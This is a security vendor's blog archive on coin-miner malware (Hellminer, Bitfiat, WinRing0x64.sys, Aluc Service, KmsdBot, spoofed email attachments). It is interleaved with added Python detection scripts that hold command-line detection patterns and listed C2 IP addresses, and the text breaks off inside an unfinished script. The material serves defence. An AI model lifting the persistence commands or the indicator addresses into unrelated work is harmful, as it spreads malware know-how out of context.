Coin Miner Archives – Gridinsoft Blog
https://gridinsoft.com/blogs/tag/coin-miner/
Welcome to the Gridinsoft Blog, where we share posts about security solutions to keep you, your family and business safe. Last updated: Tue, 02 Apr 2024 01:20:04 +0000

Hellminer.exe Coin Miner
https://gridinsoft.com/blogs/hellminer-exe-malware-analysis/ – Fri, 22 Mar 2024 15:51:29 +0000
Hellminer.exe is a process you can see in the Task Manager that indicates malicious software activity. It stands out by the high CPU load it creates, making the system much less responsive. Let’s figure out what this process is and how to get rid of it.

Hellminer malware can attack a wide range of devices, from IoT to server clusters. The final goal of its activity is bringing profit to its operators by using your hardware. Ignoring the activity of this malicious program may lead to premature hardware failure and overall performance deterioration.

Modern malware samples often come in packs, meaning that one thing may signify the presence of several others. Do not delay removal: scan your device with GridinSoft Anti-Malware and remove all the threats in one click.

What is the Hellminer.exe process?

This is a process associated with a malicious coin miner. Such malware exploits the system’s hardware to mine cryptocurrencies, mainly DarkCoin and Monero. To maximize profits, the hackers behind this malware build huge networks of infected computers. Hellminer takes up to 80% of CPU power to get substantial mining performance, making the system sluggish and uncomfortable to use.

Image: Hellminer.exe process in Task Manager

Malicious miners like this one typically get into user systems through malvertising on the Web or via dropper malware. Both spreading methods are also commonly used by other malware, so there is a risk that Hellminer is not the only infection running in the system.

This malware appears to differ from other miners, as it is not based on XMRig, the popular open-source mining software. Instead, it appears to be written in Python and is likely a private development. Let’s check out the other interesting things I found during the analysis.

Hellminer Malware Analysis

It is not completely clear how Hellminer gets into the system; I suspect it is not much different from how malware miners typically spread – via dropper malware and malvertising. After launch, the malware begins with a series of anti-VM and anti-debug checks.

Image: Hellminer execution chain

Using calls to WMI, it gets information about the CPU, looking for any signs of virtualization. I don’t think this is just immediate info gathering, because the very next step is listing the services and processes: Hellminer specifically looks for traces of the VMware virtualization environment. After these checks, the main payload is unfolded. The malware may also use the information collected at this stage to configure the mining process or as part of the system fingerprint.

wmic cpu get Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer /format:list

Fingerprinting starts with another call to WMIC, wmic os get Version. The malware retrieves a rather basic, if not scarce, set of data – just information about the operating system. After that, the malware gains persistence through another command and a series of changes in the Windows registry.

%windir%\System32\svchost.exe -k WerSvcGroup – starts the Windows Error Reporting service to make it run the malware. This increases the privilege level of the malicious program and also provides it with a disguise.

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_USE_IETLDLIST_FOR_DOMAIN_DETERMINATION

HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Security – changing network security policies.

The final round of persistence involves another call to WMI, specifically to its Adaptation Service. Hellminer forces it to recursively launch the payload, ensuring continuous execution. This command is also part of the resource allocation for the mining process.

wmiadap.exe /F /T /R

Command Server Connectivity

Like other malware miners, Hellminer does not have any extensive C2 communication. After finishing the steps above, it sends a blob of system information to the command server, effectively notifying it that the host is ready. The C2 returns a configuration file that specifies the mining pool and the IP address to connect to.

Still, one thing catches the eye – the form of command servers used by this malware. They do not look like a classic C2 model; instead they form a peer-to-peer one. In such a network, the role of command server is given to one of the infected computers. The “real” server sporadically communicates with it, retrieving information about new devices and assigning the next system to take the C2 role. This drastically increases the resilience of the network, making it particularly hard to disrupt by taking down a command server.

During the analysis, I’ve detected these command servers:

  • 20.99.184.37:443
  • 20.99.186.246:443
  • 23.216.147.64:443
  • 192.229.211.108:80
  • 20.99.133.109:443
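The command lines in the execution chain and the command server list above are exactly what a defender can turn into a detection rule. The following Python script is an added example, not code from the Gridinsoft post or from Hellminer itself: it scores constructed, Sysmon-like process-creation and network-connection records against the indicators named in this analysis (the WMIC fingerprinting commands, the WerSvcGroup service host, the wmiadap.exe relaunch and the listed C2 addresses). The `type=... host=... cmdline=...` record format, the rule weights, the threshold and the sample telemetry are assumptions made for the example.

```python
import re
from dataclasses import dataclass, field

# Command servers listed in the write-up (treat as time-bound IoCs).
C2_ADDRESSES = {
    ("20.99.184.37", 443),
    ("20.99.186.246", 443),
    ("23.216.147.64", 443),
    ("192.229.211.108", 80),
    ("20.99.133.109", 443),
}

# Command-line indicators from the execution chain, each with a weight and a label.
# wmic, svchost and wmiadap are legitimate Windows tools, so a single hit only adds
# to a host's score; the combination seen in the chain is what crosses the threshold.
COMMAND_RULES = [
    (re.compile(r"wmic\s+cpu\s+get\s+.*Manufacturer", re.I), 2, "wmic CPU fingerprint (anti-VM check)"),
    (re.compile(r"wmic\s+os\s+get\s+Version", re.I), 1, "wmic OS version fingerprint"),
    (re.compile(r"svchost\.exe\s+-k\s+WerSvcGroup", re.I), 1, "WerSvcGroup service host launched"),
    (re.compile(r"wmiadap\.exe\s+/F\s+/T\s+/R", re.I), 2, "wmiadap /F /T /R relaunch"),
    (re.compile(r"\bhellminer\.exe\b", re.I), 5, "Hellminer.exe image name"),
]


@dataclass
class HostFindings:
    score: int = 0
    reasons: list = field(default_factory=list)


def parse_record(line):
    """Parse one 'key=value key=value ...' record (assumed format).
    'cmdline=' may contain spaces, so it is always the last field and is
    taken as the remainder of the line."""
    head, sep, cmdline = line.partition(" cmdline=")
    fields = dict(kv.split("=", 1) for kv in head.split())
    if sep:
        fields["cmdline"] = cmdline.strip()
    return fields


def scan(lines, threshold=4):
    """Score every host in the records; return only hosts at or above the threshold."""
    hosts = {}
    for raw in lines:
        line = raw.strip()
        if not line:
            continue
        rec = parse_record(line)
        findings = hosts.setdefault(rec.get("host", "?"), HostFindings())
        if rec.get("type") == "process":
            for pattern, weight, label in COMMAND_RULES:
                if pattern.search(rec.get("cmdline", "")):
                    findings.score += weight
                    findings.reasons.append(label)
        elif rec.get("type") == "network":
            ip, _, port = rec.get("dst", "").rpartition(":")
            if port.isdigit() and (ip, int(port)) in C2_ADDRESSES:
                findings.score += 5
                findings.reasons.append(f"connection to listed C2 {ip}:{port}")
    return {host: f for host, f in hosts.items() if f.score >= threshold}


# Constructed sample telemetry (not real logs): WS01 shows the full chain,
# WS02 shows only benign-looking activity, WS03 only the C2 connection.
SAMPLE_LOG = r"""
type=process host=WS01 image=C:\Users\u\AppData\Roaming\Hellminer.exe cmdline=Hellminer.exe
type=process host=WS01 image=C:\Windows\System32\wbem\WMIC.exe cmdline=wmic cpu get Name,CurrentClockSpeed,L2CacheSize,L3CacheSize,Description,Caption,Manufacturer /format:list
type=process host=WS01 image=C:\Windows\System32\wbem\WMIC.exe cmdline=wmic os get Version
type=process host=WS01 image=C:\Windows\System32\svchost.exe cmdline=C:\Windows\System32\svchost.exe -k WerSvcGroup
type=process host=WS01 image=C:\Windows\System32\wbem\wmiadap.exe cmdline=wmiadap.exe /F /T /R
type=network host=WS01 image=C:\Users\u\AppData\Roaming\Hellminer.exe dst=20.99.184.37:443
type=process host=WS02 image=C:\Windows\System32\svchost.exe cmdline=C:\Windows\System32\svchost.exe -k WerSvcGroup
type=process host=WS02 image=C:\Windows\System32\wbem\WMIC.exe cmdline=wmic os get Version
type=network host=WS02 image=C:\Apps\browser.exe dst=203.0.113.5:443
type=network host=WS03 image=C:\Windows\System32\svchost.exe dst=192.229.211.108:80
""".splitlines()

if __name__ == "__main__":
    for host, f in scan(SAMPLE_LOG).items():
        print(f"{host}: score={f.score}; " + "; ".join(f.reasons))
```

The weights reflect that wmic.exe, svchost.exe -k WerSvcGroup and wmiadap.exe are all legitimate Windows components: a single hit only raises a host's score, while the whole chain on one host (or a connection to a listed C2) is what crosses the threshold. In production the addresses should be loaded from a feed that is refreshed, not hard-coded, because the peer-to-peer scheme described above rotates the C2 role between infected hosts.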

Hellminer.exe Removal Guide

Removing Hellminer malware requires scanning with anti-malware software. Such threats typically duplicate themselves into numerous folders across the system, with each copy acting as a backup. GridinSoft Anti-Malware will remove the malicious miner and all its copies in a matter of minutes. Launch a Full Scan and let it finish – this will make sure your system is as good as new.


Miner malware activity always correlates with cryptocurrency prices. At the moment, they are on the rise, meaning that more and more fraudsters will opt for this kind of malware. The typical way of spreading malicious miners is malvertising, particularly in search engines. Avoiding it requires user attention: such ads typically mimic legitimate sites that distribute freeware, but always have a different, mangled URL.

Bitfiat Process High CPU – Explained & Removal Guide
https://gridinsoft.com/blogs/bitfiat-process-high-cpu/ – Wed, 28 Feb 2024 15:28:06 +0000

Bitfiat is a malicious coin miner that exploits your computer’s hardware to mine cryptocurrencies. Such malware takes as many resources as it can, making the system impossible to use. Let’s see what this malware is and how to remove it.

Bitfiat Overview

The Bitfiat process is related to the activity of a malicious coin miner. Such malware uses your computer’s resources to mine cryptocurrencies, mainly Monero or DarkCoin. An unusual part about Bitfiat is its origins: it is based on its own technology rather than on XMRig code. This, however, is the last point where it differs from other malware miners – its behavior is as unpleasant as in other cases.

As for the symptoms, they are typical: it causes the CPU to run at maximum capacity, often reaching 100%. You may also notice that your computer’s fan runs at full speed even when you are not using any programs. Moreover, this process usually appears in Task Manager and consumes the most resources. Although coin miners usually don’t harm your files, they make your system unusable due to an overloaded CPU.

Image: The Bitfiat process in Task Manager

Bitfiat Virus Analysis

Despite having the origins different from the majority of malware miners, the infection chain of Bitfiat is pretty much the same. Let’s start from the very beginning and explore the operations of this malware. Fortunately, there are enough samples to analyze.

Spreading Methods

Bitfiat propagates through various channels, primarily leveraging cracked software and software activators (“cracks”). These are often distributed through illicit channels (like torrents) and online forums, enticing users with the promise of unlocking premium software features without paying. Even though it sounds like a fairy tale, unwary users keep downloading such “free” premiums.

Another spreading way is botnets. By paying the operators of a botnet built with dropper malware, crooks can provide themselves with massive amounts of mining nodes. The thing is, once malware as noticeable as a coin miner is deployed, the entire malware spreading chain is likely to be uncovered and the dropper removed from the machine. To maximize profits, miners are therefore spread along with other “visible” malware, like ransomware or proxyware.

Launch, C2 Connection & Mining

The majority of Bitfiat samples do not have any detection evasion tricks. And, well, how can you evade detection when your process takes up to 80% of the CPU? Right after launch, the malware performs an IP check, then collects some basic info about the system and connects to the command server.

Command servers used by Bitfiat are rather unusual: there is no direct connection to the “main” C2. Instead, the malware retrieves the needed instructions from another infected machine, i.e. they operate like a p2p network. This provides much better stability, up to autonomous existence in cases when the command server is unresponsive.

Image: P2P C2 architecture of Bitfiat

The said instructions, in the form of a config file, contain information about the mining pool and the crypto wallet address. After executing a few command prompt lines, it starts the mining process. This is the point where the most noticeable sign of malware miner activity appears – an overloaded CPU and a strange process in the list of running programs.

How To Remove Bitfiat?

Effective removal of the crypto miner requires a comprehensive approach to neutralize all malware actions. Unlike other types of malware, a miner can overload the system so that the removal tool has no resources left. To avoid this, the removal guide has one extra step.

  • Download and install GridinSoft Anti-Malware. The first thing to do is to deploy the removal tool, even though it will be used later.
  • Switch your Windows to Safe Mode with Networking. By booting into Safe Mode with Networking, you prevent the Bitfiat process from exerting its influence on the CPU. This will facilitate uninterrupted removal by antivirus software.
  • Start the Full Scan. By running a Full Scan, you make the program check every single element of the system. Such a thorough scan is essential to ensure that all the malware present in the system is removed. After the scan, click “Clean Now” to get rid of all the detected items.

WinRing0x64.sys Process – What is It? Can I Delete?
https://gridinsoft.com/blogs/winring0x64-sys-process/ – Wed, 21 Feb 2024 09:33:42 +0000

WinRing0x64.sys is a low-level driver used by specific applications. The file itself is not malicious, but malware can abuse this driver. Below, we will find out who uses WinRing0x64.sys and why, and answer the question of whether it can be removed.

WinRing0x64 Overview

WinRing0x64.sys is a crucial software component that allows applications to gain low-level access to hardware for system monitoring or overclocking purposes. It bypasses the high-level interfaces provided by the operating system to interact directly with the hardware, which makes it essential for applications that require this type of access. Most often, this driver is used by software that controls RGB backlighting. As a result, the process will appear in Task Manager.

Image: Legit file properties of WinRing0x64.sys

It is essential to understand that WinRing0x64.sys is not malicious. Although it is generally safe and helpful for specific applications, it can pose potential risks if misused. For example, the ability for direct hardware access is exceptionally beneficial to malicious miners. As it allows access at such a low level, malicious software could exploit it to gain control over hardware components. And since it is a valid Windows driver, such a trick makes the malware more complicated to detect.

WinRing0x64.sys – What Software Uses It?

As I said above, WinRing0x64.sys is most often used by software for backlight control and hardware overclocking. Noriyuki MIYAZAKI, MasterPlus, EVGA Precision, and Intel Processor Diagnostic Tool are the most common programs. Since the way the driver is used resembles malware behavior, some antivirus solutions erroneously block it.

This driver is not mandatory for Windows, so it can be removed. In practice, however, it is deactivated by uninstalling the software that uses the driver. Depending on the software, it may be located in a subfolder of “C:\” or sometimes in a subfolder of the user’s profile folder or the folder with the installed program. Although the driver does not have its window, it may appear in the running processes in Task Manager.

Is WinRing0x64.sys Malware?

Although WinRing0x64.sys is a legitimate driver, it is sometimes detected as a trojan. For example, some users complained about antivirus blocking winring0x64.sys after installing EVGA Precision overclocking software for graphics adapters. To understand whether a file is malicious, you need to weigh several factors, such as how many resources the process consumes, whether any installed software needs this driver, etc.

Suppose you downloaded video card software from an official website, and it is detected as a trojan. This is most likely a false positive. On the other hand, if you have a laptop with Intel HD graphics but WinRing0x64.sys shows up in Task Manager, it is a reason to dig deeper. Although WinRing itself cannot load the system to 100%, it can allow other processes to do this. So, if a suspicious process on your system consumes an abnormal amount of resources and you see WinRing0x64.sys among the running processes, this is a red flag. In such a case, I recommend running a full scan with Gridinsoft Anti-Malware.

Image: Suspicious process in the Task Manager
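The reasoning above (is a tool that needs the driver actually installed and running, is some other process hogging the CPU, where was the driver loaded from) can be written down as a small triage rule. The Python below is an added example, not code from the Gridinsoft post: it applies that reasoning to a constructed snapshot of the loaded driver path and the running processes. The executable names used for MasterPlus, EVGA Precision and the Intel Processor Diagnostic Tool, the CPU threshold and the user-writable path prefixes are assumptions made for the example.

```python
from dataclasses import dataclass

# Tools the post names as legitimate users of WinRing0x64.sys; the executable
# names are assumptions for this example, not taken from the post.
KNOWN_DRIVER_USERS = {
    "masterplus.exe": "MasterPlus",
    "precisionx.exe": "EVGA Precision",
    "ipdt.exe": "Intel Processor Diagnostic Tool",
}
# Locations where a legitimate hardware tool would not normally keep its driver.
USER_WRITABLE_PREFIXES = ("c:\\users\\", "c:\\programdata\\", "c:\\windows\\temp\\")


@dataclass
class Process:
    name: str
    path: str
    cpu_percent: float


def in_user_writable_location(path):
    return path.lower().startswith(USER_WRITABLE_PREFIXES)


def assess_winring0(driver_path, processes, cpu_threshold=50.0):
    """Triage a host on which WinRing0x64.sys is loaded.

    Returns (verdict, reasons) with verdict one of 'not loaded', 'legitimate',
    'investigate' or 'red flag'. The driver alone never produces a red flag;
    it is the combination with an unexplained CPU hog that does."""
    if driver_path is None:
        return "not loaded", []
    risk, reasons = 0, []

    if in_user_writable_location(driver_path):
        risk += 1
        reasons.append(f"driver loaded from user-writable path: {driver_path}")

    running_tools = [KNOWN_DRIVER_USERS[p.name.lower()]
                     for p in processes if p.name.lower() in KNOWN_DRIVER_USERS]
    if running_tools:
        reasons.append("known driver user running: " + ", ".join(running_tools))
    else:
        risk += 1
        reasons.append("no known monitoring/overclocking tool is running")

    # A process the driver cannot account for, burning CPU, is the post's red flag.
    for p in processes:
        if p.cpu_percent >= cpu_threshold and p.name.lower() not in KNOWN_DRIVER_USERS:
            risk += 2 if in_user_writable_location(p.path) else 1
            reasons.append(f"{p.name} at {p.cpu_percent:.0f}% CPU from {p.path}")

    verdict = "legitimate" if risk == 0 else "red flag" if risk >= 3 else "investigate"
    return verdict, reasons


# Constructed snapshots (not real telemetry).
LEGIT_HOST = (r"C:\Program Files\EVGA\Precision\WinRing0x64.sys", [
    Process("precisionx.exe", r"C:\Program Files\EVGA\Precision\precisionx.exe", 3.0),
    Process("browser.exe", r"C:\Program Files\Browser\browser.exe", 12.0),
])
INFECTED_HOST = (r"C:\Users\alice\AppData\Local\Temp\WinRing0x64.sys", [
    Process("svchost.exe", r"C:\Windows\System32\svchost.exe", 2.0),
    Process("updater.exe", r"C:\Users\alice\AppData\Roaming\updater.exe", 85.0),
])
UNCLEAR_HOST = (r"C:\Program Files\RGBControl\WinRing0x64.sys", [
    Process("explorer.exe", r"C:\Windows\explorer.exe", 4.0),
])

if __name__ == "__main__":
    for label, (driver, procs) in [("legit", LEGIT_HOST), ("infected", INFECTED_HOST), ("unclear", UNCLEAR_HOST)]:
        verdict, reasons = assess_winring0(driver, procs)
        print(f"{label}: {verdict} | " + "; ".join(reasons))
```

The "investigate" outcome is deliberate: a driver that no known tool explains, but with nothing abnormal in the process list, is exactly the laptop-with-Intel-graphics case from the post, where the right answer is to dig deeper rather than to delete or to ignore.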

Aluc Service: What Is Aluc App & How to Remove?
https://gridinsoft.com/blogs/aluc-service-how-to-remove/ – Wed, 11 Oct 2023 09:02:51 +0000

Aluc Service is a strange service you can see in the Task Manager. It is, in fact, a malware-related process that hides behind a legitimate-looking name. Most commonly, such a trick is used by coin miner malware and rootkits.

What is Aluc Service?

At a glance, Aluc Service may look like a legit service among the hundreds running in Windows. However, even a tiny bit of research shows that it is not something common: no well-known program has a service named in such a manner. Moreover, users commonly report that it consumes significant amounts of CPU power. This makes me assume that it is most likely related to coin miner malware activity.

Image: Reddit user complaining about Aluc Service consuming a lot of CPU power

But why would malware take the disguise of a service? Well, the vast majority of malware does this trick – hooking up to a system service to make itself run without any permissions. The thing is, not much other malware takes as much CPU power as coin miners do. While a strange service launched by spyware will remain unnoticed, a miner would not – simple math.

Aluc Service – Is It Dangerous?

The main issue coin miners like Aluc Service create is system overload. Such software does not care whether you want to use your computer, or what for – it will take 60-80% of your CPU power. By connecting hundreds and thousands of infected machines to a mining pool, hackers provide themselves with a free mining farm. Even though mining crypto on a CPU is inefficient, the number of processors involved makes up for it. Moreover, crooks commonly opt for coins with a less complicated blockchain, like Monero or DarkCoin.

However, an overloaded system is not the only issue here. Hackers who work with coin miners often use the services of dropper malware. That means you may have one more piece of malware – or even several, if other hackers used the same dropper to deliver their payloads. There could be several other malicious things in your system, and they are much stealthier than the coin miner.

How did I get infected?

There are many possible ways of getting infected, but hackers commonly opt for a couple of the most cost- and effort-efficient methods. Among them are email spam, software cracks, and search result hijacking. The former two can spread pretty much any malware, while the latter is a common basis for multi-stage attacks. The droppers I mentioned above prefer to sneak in as fake software installers and then perform all the dirty deeds.

Image: Fake email from X – it can throw you to a phishing site as well as to a malware download

That being said, it is important to keep in mind that cybercriminals seek new opportunities pretty much constantly. Hackers adjust their attack campaigns correspondingly to the circumstances, so it is tough to know what you should be prepared for.

How to remove Aluc Service?

Removing such things manually is not the best idea. Malware that exploits service creation for persistence can sometimes protect those services, so attempts to remove it by simply stopping and deleting them may end up with a BSOD. Moreover, you can see the Aluc Service running but miss all the other threats present in your system. For that reason, a scan with a proper anti-malware program is recommended. GridinSoft Anti-Malware will get this problem sorted in 10 minutes.


How to stay safe online?

Based on the spreading methods and injection approaches I mentioned before, it is not hard to create a list of effective ways to avoid malware infections.

Be cautious with email spam. There are several places to watch out for:

  • Verify Sender. Never open email attachments or click on links in emails from unknown or suspicious senders. Verify the sender’s identity if you’re unsure.
  • Check for Spelling and Grammar. Be wary of emails with poor grammar and spelling, as these are often red flags for phishing attempts.
  • Avoid Pop-Up Promotions. Don’t click on pop-up promotions or offers in emails, especially those that seem too good to be true.

Steer clear of software cracks. Their hazards are not only about malware but also about legal consequences for breaking the copyright law.

  • Use Legitimate Sources. Only download software and applications from reputable sources and official websites. Avoid using cracked or pirated software, as these often come bundled with malware.
  • Regularly Update Software. Keep your operating system, software, and antivirus programs up to date. Updates often include security patches that protect against vulnerabilities.

Protect against search engine hijacks. Here, your attention and double-checking are key.

  • Avoid Clicking Search Result Ads. Google, along with other search engine providers, embeds advertisements at the top of its search results. As users tend to choose the top results, they click promoted sites without considering that the link may be malicious.
  • Verify Search Results. Before clicking on a search result, review the URL and ensure it looks legitimate. Avoid clicking on suspicious links.

Employ anti-malware software. A well-made security solution, like GridinSoft Anti-Malware, will serve for both proactive and reactive protection.

  • Install Reliable Security Software: Use a reputable antivirus and anti-malware program on your computer and keep it updated. Schedule regular scans of your system.
  • Enable Real-Time Protection: Activate real-time protection features to prevent malware from executing on your system.

KmsdBot malware combines DDoS-attacks and coin mining
https://gridinsoft.com/blogs/kmsdbot-malware-ddos-coin-mining/ – Mon, 14 Nov 2022 19:04:32 +0000

A new malware, called KmsdBot, strikes user devices. The Akamai SIRT has discovered a new malware that uses the SSH (Secure Shell) protocol to infiltrate target systems in order to mine cryptocurrency and carry out DDoS attacks. It spreads disguised as a bot for popular games, in particular, GTA V. The combined threat raises malware analysts’ concerns about the possible massive spreading of such malware.

KmsdBot strikes, using security vulnerabilities

The experts called the malware KmsdBot. It is written in Go and is aimed at various companies – from gaming to automotive brands and security firms. Go is gaining popularity among malware developers, as binaries written in it are quite hard to reverse engineer. The botnet infects systems via SSH connections using “weak” login credentials. KmsdBot does not remain persistent on the infected system, to avoid detection.

The malware gets its name from the “kmsd.exe” executable, which is downloaded from a remote server after a successful compromise. It is designed to support multiple architectures – Winx86, Arm64, mips64 and x86_64. KmsdBot can perform scanning and self-propagation by downloading a list of username/password combinations. The botnet is also able to control mining processes and malware updates; this control happens through communication with the C2 server.

Image: Command for KmsdBot to attack the target server, sent from the C2
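Because KmsdBot gets in over SSH with guessed passwords, the sshd log on a Linux host is where a defender sees it first. The Python below is an added example, not code from the Gridinsoft post or from Akamai's report: it walks constructed sshd log lines (syslog format, documentation IP ranges) in order and flags sources that fail repeatedly, distinguishing guessing that is still in progress from a guess that was eventually accepted. The failure threshold and the sample lines are assumptions made for the example.

```python
import re

# Matches the password-auth outcome lines sshd writes to syslog (publickey
# logins do not match and are ignored on purpose).
AUTH_LINE = re.compile(
    r"sshd\[\d+\]: (Failed|Accepted) password for (?:invalid user )?(\S+) "
    r"from (\d{1,3}(?:\.\d{1,3}){3}) port \d+"
)


def analyze_auth_log(lines, failure_threshold=5):
    """Walk sshd log lines in order and return {source_ip: finding}.

    A source with at least `failure_threshold` failed passwords is flagged as
    'password guessing'; if such a source is later accepted, the finding becomes
    'credential guessed' and names the account. That is the KmsdBot pattern:
    work through a list of username/password pairs until one succeeds."""
    state = {}
    for line in lines:
        m = AUTH_LINE.search(line)
        if not m:
            continue
        outcome, user, ip = m.groups()
        s = state.setdefault(ip, {"failures": 0, "users": set(), "guessed": []})
        if outcome == "Failed":
            s["failures"] += 1
            s["users"].add(user)
        elif s["failures"] >= failure_threshold:
            s["guessed"].append(user)  # a success only counts after a run of failures
    findings = {}
    for ip, s in state.items():
        if s["guessed"]:
            findings[ip] = {"verdict": "credential guessed",
                            "accounts": sorted(set(s["guessed"])), "failures": s["failures"]}
        elif s["failures"] >= failure_threshold:
            findings[ip] = {"verdict": "password guessing",
                            "accounts": sorted(s["users"]), "failures": s["failures"]}
    return findings


# Constructed sample log (documentation IP ranges, not real hosts).
SAMPLE_AUTH_LOG = """\
Nov 14 19:01:02 srv1 sshd[2101]: Failed password for root from 203.0.113.7 port 51234 ssh2
Nov 14 19:01:05 srv1 sshd[2102]: Failed password for invalid user admin from 203.0.113.7 port 51240 ssh2
Nov 14 19:01:08 srv1 sshd[2103]: Failed password for invalid user pi from 203.0.113.7 port 51244 ssh2
Nov 14 19:01:11 srv1 sshd[2104]: Failed password for invalid user user from 203.0.113.7 port 51250 ssh2
Nov 14 19:01:14 srv1 sshd[2105]: Failed password for invalid user test from 203.0.113.7 port 51255 ssh2
Nov 14 19:01:17 srv1 sshd[2106]: Failed password for ubuntu from 203.0.113.7 port 51260 ssh2
Nov 14 19:01:20 srv1 sshd[2107]: Accepted password for ubuntu from 203.0.113.7 port 51266 ssh2
Nov 14 19:02:01 srv1 sshd[2110]: Failed password for alice from 198.51.100.9 port 40001 ssh2
Nov 14 19:02:09 srv1 sshd[2111]: Accepted password for alice from 198.51.100.9 port 40002 ssh2
Nov 14 19:02:30 srv1 sshd[2112]: Accepted publickey for bob from 198.51.100.20 port 40010 ssh2
Nov 14 19:03:00 srv1 sshd[2120]: Failed password for root from 192.0.2.44 port 33001 ssh2
Nov 14 19:03:03 srv1 sshd[2121]: Failed password for root from 192.0.2.44 port 33004 ssh2
Nov 14 19:03:06 srv1 sshd[2122]: Failed password for invalid user admin from 192.0.2.44 port 33007 ssh2
Nov 14 19:03:09 srv1 sshd[2123]: Failed password for invalid user admin from 192.0.2.44 port 33010 ssh2
Nov 14 19:03:12 srv1 sshd[2124]: Failed password for root from 192.0.2.44 port 33013 ssh2
""".splitlines()

if __name__ == "__main__":
    for ip, finding in analyze_auth_log(SAMPLE_AUTH_LOG).items():
        print(f"{ip}: {finding['verdict']} after {finding['failures']} failures, accounts {finding['accounts']}")
```

A user who mistypes a password once and then logs in (198.51.100.9 in the sample) stays below the threshold and is not reported, which is the point of keeping the count per source rather than alerting on every failure. Since KmsdBot does not persist, the accepted login is often the only durable trace, so the "credential guessed" finding is the one worth paging on.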

According to Akamai, the first detected target of KmsdBot was the gaming company FiveM, a multiplayer mod for GTA V that allows players to access custom role-playing servers. Botnet DDoS attacks include OSI Layer 4 and 7 attacks, in which a flood of TCP, UDP, or HTTP GET requests are sent to overwhelm the target server’s resources and bring it into a denial of service state. It is noteworthy that the KmsdBot botnet began as a bot for a gaming application, but turned into a tool for attacking worldwide-known names.

Is KmsdBot dangerous?

Like any other malware, KmsdBot is not a pleasant addition to the infected system. It brings coin mining and DDoS capabilities, which create enough problems for PC usage regardless of the task. Mining implies high hardware utilisation rates, which makes it problematic even to use basic apps. DDoS attacks, on the other hand, not only take a lot of bandwidth, but can also lead to bans for the IP address of an infected PC on the attacked sites.

The other side of the danger of this malware is the way it spreads into users’ computers. Aside from the fact that exploitation is not typical for malware that aims at individual users, it also opted for the disguise of a bot for the game GTA V. Gamers are known as not the most careful users, being the usual audience for cracks, patches, and various automation tools like bots. Since GTA V is not the only game that makes bot usage profitable, a surge in KmsdBot spreading is to be expected in the coming weeks.

Extension spoofing strikes Spanish-speaking countries
https://gridinsoft.com/blogs/extension-spoofing-spanish-speakers/ – Tue, 07 Jun 2022 17:02:55 +0000

A good old form of malware disguise has recently flared up in several Spanish-speaking countries across the globe. Users report numerous cases of email attachments with spoofed file extensions that turn out to be coin miner trojans.

Massive outbreak of extension spoofing in email spam

Email spam is a form of malware spreading that became very popular at the turn of the current decade. It was used earlier as well, but on a much smaller scale. This spreading method fits different needs – from mass spamming without target selection to spear phishing against corporate employees. In modern practice, email spam usually contains something that makes the victim believe the letter is legitimate: a background similar to the one used by FedEx, some routine patterned words about an incoming delivery – and voilà – the user believes you. After gaining your trust, they will try to trick you into following a link or opening the attached file; the latter usually contains malware. The former may lead the victim to a phishing page or to an exploit site where crooks will try to install malware.

So, if attaching malware is nothing new, why wonder about the new wave? Hundreds of such campaigns happen each day, so they do not look like something worth attention. The peculiar thing about these attacks is that they use extension spoofing techniques to disguise the attached file. That approach had not been seen for a long time – but it has popped up again.

What is extension spoofing?

Extension spoofing is a trick with file names that visually changes the file format. It relies on the default Windows setting for displaying file extensions: by default, you see only the file names – without extensions. When you view the opened folder in list view mode, you will likely not see the file icons either. Therefore, an attacker can put a fake extension in the visible part of the name while the real, final extension stays hidden.

Image: Here is what extension spoofing looks like

For example, you can create a batch script file and name it “tuxedo-cat.png.bat”. Users will see it as “tuxedo-cat.png”, but in fact it is a batch file that will run as soon as you try to open it. Moreover, inexperienced users may easily miss the second extension, thinking that the first one is the real one. This trick is very old, but still effective – especially with the latest visual updates in Windows.

Who is under attack?

Most of the observed cases appear in Spanish-speaking countries. Users from Mexico, Chile, Ecuador and, of course, Spain reported the appearance of routine-looking emails with attached files. The latter had names like “confiromidad entrega material ].xlsx.exe” or “resumenes info socioeco.xlsx.exe”. As you can see, the extension spoofing here is in its simplest form – the one you can uncover just by looking at the detailed information about the file. However, the victims were tricked by the file names – they were too similar to the documents you work with every day.

Image: Example of a message with a malicious attachment. The file mimics a legit MS Word file

The coin miner virus hides in those files. When you try to open the file, thinking it is legit, you will see no effect. But in the background, the malware starts its nasty job. Coin miners, as you can guess from the name, exploit your hardware to mine cryptocurrencies. Contrary to legitimate miners that you can install yourself, these do not let you set how much hardware power they can use. You will see your CPU and GPU overloaded, so the PC will be barely operable.

How to prevent extension spoofing and email spam?

There is not a lot you can do about email spam itself. Mailing will be possible as long as you have an active email account. However, you can do a lot to make the spam much less relevant and thus less believable.

  • Don’t spread any personal information. Crooks use it in spear phishing campaigns, which involve creating a very realistic disguise. To make their task impossible, just don’t share screenshots of your routine mail, information about your incoming shipments, and so on.
  • Use separate email accounts for work mail and your personal needs. Seeing a work-related mail in your personal mailbox instantly shows that you are looking at a fraudulent message. During the initial target reconnaissance, crooks will likely fail to notice that these emails have different purposes.
  • Extension spoofing is much easier to prevent. There are techniques which allow the crooks to mask the file in a more reliable way, but they are rarely used these days. Most cases can easily be mirrored with simple diligence.

  • Check-up the file extensions. That advice may sound like a truism, nonetheless it is a bad idea to deny its effectiveness. Seeing doubtful things like “wallpaper.jpg.exe” or “report.xlsx.ps2” must be the trigger to your vigilance.
  • Enable the extensions displaying. By default, in fresh Windows installations and/or new user profiles you will have the file extensions hidden. That option makes the fraud possible, as I have shown you above. Enable it in File Explorer: go to View→Show→Show file extensions. That simple step is enough to uncover the tricks.
  • Enable extensions

  • Use anti-malware software.There is no more effective and easy way to mirror the malware attack than using the anti-malware solution. It is capable of monitoring the incoming files even before you’d try to open it. Hence, cybercriminals who apply these tricks will have no chance.
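Here is an added example, not part of the original post, that applies the checks above programmatically: it looks at the real (last) extension behind a document-looking name, strips a right-to-left override character if one is present, and compares the name with the file’s first bytes (a Windows PE executable starts with “MZ” whatever it is called). The extension lists and the sample file names are assumptions for illustration.

```python
# Added example (not from the Gridinsoft post): flag attachments whose name
# or first bytes suggest an executable disguised as a document.
import os
from typing import List

# File types a user expects to open without fear (assumed list).
DOCUMENT_EXTS = {"doc", "docx", "xls", "xlsx", "ppt", "pptx", "pdf", "txt",
                 "jpg", "jpeg", "png", "csv", "rtf"}
# Extensions Windows runs directly or hands to a script host (assumed list).
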